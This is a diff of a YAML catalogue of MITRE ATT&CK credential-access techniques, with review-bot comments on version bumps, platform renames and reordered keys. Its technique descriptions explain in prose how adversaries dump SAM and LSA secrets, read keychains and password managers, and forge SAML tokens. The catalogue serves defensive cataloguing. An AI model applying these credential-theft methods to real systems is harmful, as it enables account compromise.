@@ -52556,10 +53214,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -52567,14 +53226,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
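Review bot: collapsing `- Office 365` and `- Google Workspace` into the single entry `+ - Office Suite` changes the platform set for this technique, and the same collapse is applied to other techniques later in this patch (with `Azure AD` becoming `Identity Provider`). Any artifact derived from platform membership (per-platform indexes, coverage matrices) has to be regenerated in the same change, otherwise techniques will vanish from platform views that still use the old names; the `x_mitre_version` bump from '1.3' to '1.4' is the upstream marker for that remap and should be mentioned in the commit message.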
@@ -52617,14 +53276,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -52679,14 +53335,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -52737,14 +53392,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -52778,8 +53432,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -52796,11 +53450,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
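Review bot: T1555.002 goes from `x_mitre_modified_by_ref` straight to `atomic_tests: []` with no `identifier: T1555.002` line, whereas the neighbouring entries (T1003.002, T1552.005, T1110.002) all carry `identifier:` before `atomic_tests:`. This is pre-existing rather than introduced by the patch, but the patch is already touching this block, so it is a cheap fix; any tooling that keys on `identifier` will silently skip this technique.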
@@ -52818,7 +53471,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -52835,10 +53488,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -52862,46 +53515,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
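Review bot: the entire T1555.001 object is deleted here and re-emitted in the next hunk with its keys in a different order, which hides the actual change (the `External to DA, the OS X Way` URL and retrieval date, and the `x_mitre_attack_spec_version` bump) inside a wall of moved lines. I checked that every removed key reappears: `id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3`, `created: '2020-02-12T18:55:24.728Z'`, `x_mitre_version: '1.1'`, `revoked: false`, and all five external references. If the new key order comes from a serializer change, say so in the commit message so reviewers of later regenerations know the reorder is mechanical and can focus on the value changes.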
@@ -52922,65 +53541,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
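Review bot: the T1003.004 description at the end of this hunk is split as `...HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets` followed by a separate line beginning `. LSA secrets can also be dumped`, so the registry path and its sentence-ending period have been torn apart, which reads like inline-code markup stripped by the generator with a line break left behind. The same pattern shows up in the T1606.002 description further down (`NotOnOrAfter`, `conditions ...` and `LifetimeTokenPolicy` each stranded on their own line). These are context lines, so this patch does not introduce the damage, but the generator's handling of inline code in upstream descriptions should be checked before more regenerated content lands.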
@@ -52989,6 +53605,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -52996,31 +53615,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
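Review bot: `x_mitre_permissions_required:` / `- SYSTEM` is removed from T1003.004 and nothing replaces it, so the SYSTEM requirement now lives only in the prose description; if anything in this repo derives `elevation_required` or similar flags from that field, it needs another source. Separately, the re-added Tilbury reference still carries the stray digit in `1Windows Credentials: Attack, Mitigation, Defense`; that text comes from upstream, so correct it there rather than hand-editing a generated file.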
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
@@ -53033,14 +53684,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -53081,14 +53732,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
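Review bot: in the T1003.007 description the paths read `/proc//maps` and `/proc//mem`, i.e. the PID placeholder between the two slashes is missing, consistent with an angle-bracket placeholder being consumed as an HTML tag during generation. The citation key `Picus Labs Proc cump 2022` also has a typo, but it must match the `source_name` of its external reference, so it must not be corrected in isolation. Both are context lines; flagging them for the generator rather than for this patch.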
@@ -53151,7 +53799,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests:
- name: Dump individual process memory with sh (Local)
@@ -53367,76 +54014,75 @@ credential-access:
elevation_required: true
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
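Review bot: two things to check in the T1555.005 rewrite. First, `x_mitre_permissions_required:` / `- User` is dropped with no replacement (same pattern as T1003.004), while `x_mitre_version` moves from '1.0' to '1.1' even though the description and detection text re-added here are identical to the removed lines; that is fine if it mirrors upstream, but the commit message should say the version bumps are upstream-driven. Second, after the re-added `x_mitre_modified_by_ref` the block goes directly to `atomic_tests: []` with no `identifier: T1555.005` line, unlike T1555.001 above, so consumers keying on `identifier` will miss this technique.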
@@ -53521,7 +54167,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Linux using tshark or tcpdump
@@ -53814,7 +54459,7 @@ credential-access:
elevation_required: true
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -53863,38 +54508,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
